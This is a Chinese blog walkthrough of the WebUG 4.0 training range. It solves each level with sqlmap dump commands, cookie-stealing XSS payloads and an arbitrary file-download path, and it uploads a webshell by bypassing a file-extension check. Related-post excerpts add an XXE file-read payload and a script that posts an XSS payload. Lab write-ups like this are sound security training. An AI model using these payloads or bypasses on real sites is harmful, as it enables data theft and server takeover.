webug4.0靶场通关笔记

最新推荐文章于 2025-01-31 16:08:23 发布
最新推荐文章于 2025-01-31 16:08:23 发布
阅读量2.2k 收藏 13
点赞数 3
分类专栏: 网络安全挑战:靶场的奇妙冒险,一步一坑,一步一惊喜 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_47289634/article/details/131701846
版权

文章目录

注入

显错注入

随便加个符号,直接就爆出了SQL语句和闭合方式
在这里插入图片描述
很明显参数id存在sql注入,上sqlmap,这里是登录后才能打开这个网页,直接把数据包保存至kali桌面,数据包保存为1.txt

爆数据库,爆表
sqlmap -r 1.txt --dbs  
sqlmap -r 1.txt -D webug --tables

在这里插入图片描述
在这里插入图片描述

爆字段
sqlmap -r 1.txt -D webug -T flag --cloumns

在这里插入图片描述

查看flag
sqlmap -r 1.txt -D webug -T flag -C flag --dump

在这里插入图片描述

布尔注入

打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样
在这里插入图片描述
保存数据包到sqlmap跑一下,跟上关差不多,因为用到是基于时间的盲注,所以会很费时间
在这里插入图片描述

sqlmap -r 1.txt --dump -D webug -T flag -C flag

在这里插入图片描述

延时注入

跟上个一样,很费时间

post注入

搜索框输入1’ 会报错,注入点在这
在这里插入图片描述
猜字段

1' order by 3--+
1' order by 2--+

sqlmap

sqlmap -r '1.txt' -D webug -T flag -C flag --dump

过滤注入

同上,并没有过滤

宽字节注入

xxe注入

csv注入

万能密码登陆

密码处直接填写pyload
在这里插入图片描述

XSS

反射型xss

直接在url添加pyload
在这里插入图片描述

存储型xss

留言处添加pyload,之后刷新一下网页,就弹出来了
在这里插入图片描述

DOM型xss

输入框随意输入些东西,看一下位置value=“111”
在这里插入图片描述
构造pyload,点击搜索即可

"><script>alert(document.cookie)</script><

在这里插入图片描述

过滤xss

只是过滤了script,换个就是

<img src=1 onerror=alert(document.cookie)>

在这里插入图片描述

链接注入

构造pyload,点一下直接跳转到百度

<a%20href="http://baidu.com"><h5>点我点我点我点我点我点我</h5></a>

在这里插入图片描述

任意文件下载

任意文件下载

右击下载看一下链接地址
在这里插入图片描述

http://192.168.0.130/webug/control/filedownload/file_download.php?file=template/assets/img/1.txt

看到file协议使用不当就可能会造成任意文件下载,这里构造pyload试一下

file=/index.php

果然下载成功
在这里插入图片描述

mysql配置文件下载

上传漏洞

文件上传(前端拦截)

F12可以看到对上传的文件进行了后缀限制
在这里插入图片描述
把shell后缀改成png格式,抓包,在数据包中在改回php格式
在这里插入图片描述
上传成功
在这里插入图片描述
冰蝎连接成功
在这里插入图片描述

文件上传(解析漏洞)

这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。最后就变成了php文件,人家是成功了,但我还是不行
在这里插入图片描述

文件上传(畸形文件)

双写绕过
在这里插入图片描述

文件上传(截断上传)

人家的,我依然不可以

文件上传(htaccess)

代码有问题,跳过

逻辑漏洞

越权修改密码

万能密码
在这里插入图片描述

支付漏洞

直接价格改成-1
在这里插入图片描述
这就成功了,离谱

在这里插入图片描述

邮箱轰炸

随便输入一个邮箱,因为没有任何防御措施,很可能造成邮箱轰炸,跟短信炸弹一个道理
在这里插入图片描述

越权查看admin

所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的

其它

url跳转

更改url的跳转地址
在这里插入图片描述
在这里插入图片描述

文件包含

打开靶场,看到这个url,这。。。太明显了阿
在这里插入图片描述
配合一下刚刚的文件上传,直接就执行了phpinfo
在这里插入图片描述

结束

在这里插入图片描述

Webug4.0靶场通关笔记(第九天)--------完结篇
Yasso的博客
02-27 1238
一、文件包含漏洞 二、命令执行 三、webshell爆破 四、ssrf 明天就开学了~~唉,剩下的就都打完算了!!! 一、文件包含漏洞 文件包含漏洞在ctf上种类有很多,我接触过的有php伪协议、日志包含、目录遍历、session文件包含等等。全阐述的话我是讲不完(主要还是菜),就拿这webug4.0靶场当例子吧. 打开靶场注意url栏(文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码(index.php),这里用的是base64读取) ?filename=php://fi
Webug4.0靶场通关笔记(第八天)--------22-26
Yasso的博客
02-26 652
一、越权修改密码 二、支付漏洞 三、邮箱轰炸 四、越权查看admin 五、URL跳转 一、越权修改密码 二、支付漏洞 三、邮箱轰炸 四、越权查看admin 五、URL跳转
Webug3.0靶场练习初级第一关多种技巧攻略(小白通俗易懂)
最新发布
qq_51627054的博客
01-31 984
1.第一个关卡是一个简单的sql注入练习测试。2.方法一:使用sqlmap直接跑数据也是最简单,没有像手动那样麻烦,可以跑出对应的数据库以及对应的表和表里面的内容*直接跑出当前数据库内容使用get提交* 这时候可以直接跑出一些表中的数据内容 3.方法二:使用手工的方式去一步步去尝试,比较繁琐,但推荐练习,这样不仅仅提高基本的技能水平。*第一步先看看有没有注入点,当然既然是靶场肯定有注入点,但是作为练习,第一步依旧需要尝试一下。 发现运行结果正常,说明有注入点。 *下一步要证明有多少个字段,可以使用order
webug靶场通关(1-5)
abv545411的博客
11-19 427
一个全新的界面,尝试点了其他的链接都打不开,发现一个搜索框,随便输入一些,页面都正常,当输入单引号时,页面报错。这道题的延时盲注步骤和第二关是一样的,就不多做赘述了,将拼接的sql语句附上,其中的表名,字段名自行替换。尝试单双引号的测试,有页面不正常的,看来也是可以用到布尔盲注的,我尝试了一下,布尔盲注也是也可以的。单双引号测试,单引号报错,使用单引号闭合,order by 2时正常,3不正常,所以是2个字段。仔细看和第一关的flag一样,看来得在其他表中找了,步骤是一样的,不过多赘述了。
webug4.0通关
qq_18831583的博客
07-01 427
一、显错注入 1、id换为2,3,4 http://10.128.175.155/control/sqlinject/manifest_error.php?id=1,可以看到前端显示不一样的内容2、查看字段数:order by 2 order by 1,order by 2时,可以正常显示,order by 3时报错,可得到字段数为23、查看回显点:union select 1,2 可以看到回显点在第二个字段,可以替换第二个字段来获取数据库的相关信息4...
webug 4.0通关
SwBack的博客
04-04 1159
去年写的,写完就忘记了。第二关到第五关记得当时嫌麻烦没搞。。凑合看吧推下导航页面,极客导航 | 用爱发电第一关 显错注入打开页面,猜测URL是注入点,单引号测试,成功报错。查询字段长度1'order by 2--+ 回显正常1'order by 3--+ 报错 字段长度为2 查询数据库名,可以看到,只有第二个字段有输出。如此使用group_concat()进行查询。1'union select 1...
webug4.0通关笔记
alert['Hello World']
11-03 7215
目录显错注入布尔注入延时注入post注入过滤注入宽字节注入xxe注入csv注入反射型xss存储型xss万能密码登陆任意文件下载DOM型xss过滤xss链接注入任意文件下载mysql配置文件下载文件上传(前端拦截)文件上传(解析漏洞)文件上传(畸形文件)文件上传(截断上传)文件上传(htaccess)越权修改密码支付漏洞邮箱轰炸越权查看adminURL跳转文件包含漏洞命令执行webshell爆破ssrf 环境下载地址: 显错注入 注入点: control/sqlinject/manifest_error.
Webug4.0靶场通关笔记(第二天)--------延时注入和post注入
Yasso的博客
02-20 898
一、延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。 1.先判断字段数 2.判断数据库(webug) ?id=1’ and if(substr(database(),1,1)=‘w’,1,sleep(5))%23 (判断数据库第一个字母是否为w,是的话页面正常,否则沉睡5秒) ?
Webug4.0靶场通关笔记(第一天)--------显错注入和布尔注入
Yasso的博客
02-20 1140
一、显错注入 打开靶场试试尝试修改为id=2,回显hello。 1、首先判断注入点 插播一条,php版本必须为5.3.29,不然不会报错!!!!!!!!!!!!!!!! 尝试加单引号,会报错, (%23不能在hackbar上输入,否则会一直报错,我们来测试下在hackbar上输的%23到url上变成了%2523,很明显这是#的二次url编码)还是不用hackbar了,也可能是我的hackbar有问题。 ?id=1’ 页面报错 ?id=1’ or 1=1%23 页面显示正常 (这里#貌似被过
Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入
Yasso的博客
02-22 955
一、xxe注入 这道题应该是最简单的任意文件读取 打开是一个输入框 在C盘构造一个flag,别问我为啥,我也不知道。。。 bp抓个包 随便输入个什么都有回显,应该是基础的XXE注入 这是一段读取文件的xml<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY B SYSTEM "file:///c:/1.txt"> ]> <xml> <xxe>&B;</xxe&g...
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
Webug4.0靶场通关笔记(第七天)--------文件上传(all)
Yasso的博客
02-25 766
目录 一、文件上传(前端拦截) 二、文件上传(解析漏洞) 三、文件上传(畸形文件) 四、文件上传(截断上传) 五、文件上传(htaccess) 一、文件上传(前端拦截) 上传一句话木马抓包,改后缀为php,上传成功 连接蚁剑,成功,但我没找到flag。百度flag为sadfsadfsdadf。 二、文件上传(解析漏洞) 三、文件上传(畸形文件) ...
Webug4.0靶场搭建
BGiscool的博客
10-28 2913
Webug4.0靶场
Webug4.0靶场过关--注入
BGiscool的博客
11-01 1558
webug靶场过关秘籍
webug4.0通关之路(1)显错注入
weixin_45822019的博客
04-25 843
一、题目打开 二、在URL处进行注入测试 三、利用注入点 猜测列: 暴库: 爆表名: 爆列名: 探测字段内容:
webug4.0靶场搭建
nex1less的博客
08-22 2789
0x01 webug4.0镜像下载 1.webug官网:www.webug.org 2.开发环境:php+mysql+apache 3.百度云盘链接:https://pan.baidu.com/s/1fVTQY2wuNCRTQu5-BnelEA 提取码:lmzc 0x02 webug4.0在VMware上安装 1.下载完的文件:截图 2.VMware打开:配置不用改 截图...
webug4.0靶场通关之XSS
0nc3的博客
06-24 854
0x00 反射型XSS 以进入页面就寻找搜索框,发现有个放大镜点着没有反应 但改URL中的id进行搜索 Payload: <script>(document.cookie)</script> 0x01 存储型XSS 下拉置底部留言板处 提交xss一句话留言 Payload: 0x02 Dom型XSS 看到搜索框,F12查看元素 搜索框的输入是给value参数传...
webug4.0通关笔记----(第一天:显错注入)
liver100day的博客
04-23 820
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
Webug4.0 打靶笔记
m0_60716947的博客
05-11 4954
一、Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
pikachu靶场通关安装
01-10
### Pikachu 靶场安装教程 对于希望在本地环境中搭建并运行Pikachu靶场的人来说,可以从浏览器下载链接`https://codeload.github.com/zhuifengshaonianhanlu/pikachu/zip/refs/heads/master`获取项目资源[^1]。下载完成后得到的是压缩包形式的文件,需将其解压至`phpstudy_pro/WWW`目录下以便于通过PHPStudy Pro环境访问。 为了确保能够顺利部署Pikachu靶场,在完成上述操作之后还需要确认服务器配置正确无误,并启动Web服务使得可以通过浏览器访问到应用页面。通常情况下,默认端口设置为80或8086,具体取决于个人配置情况以及是否有其他服务占用这些端口号。 一旦成功部署完毕,则可以在浏览器输入框内键入类似`localhost:8086/pikachu-master/vul/xss/xssblind/admin_login.php`这样的URL来验证是否可以正常加载目标网页[^2]。 ### Pikachu 靶场通关攻略概览 针对XSS漏洞练习模块中的盲型跨站脚本攻击部分,用户应当尝试理解如何利用JavaScript代码注入技术绕过现有防护机制实现对管理员账户登录状态的操作控制。这不仅涉及到HTML标签属性值内的恶意代码嵌入技巧,还包括了对HTTP请求参数传递方式的理解与运用。 除了掌握基本概念外,实际动手实践也是不可或缺的一环。建议读者仔细阅读官方文档说明,积极参与社区交流讨论,不断积累经验教训从而提高解决问题的能力水平。 ```python # 示例Python代码用于模拟发送带有payload的有效载荷给服务器 import requests url = "http://example.com/login" data = {"username": "<script>alert('XSS')</script>", "password": ""} response = requests.post(url, data=data) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值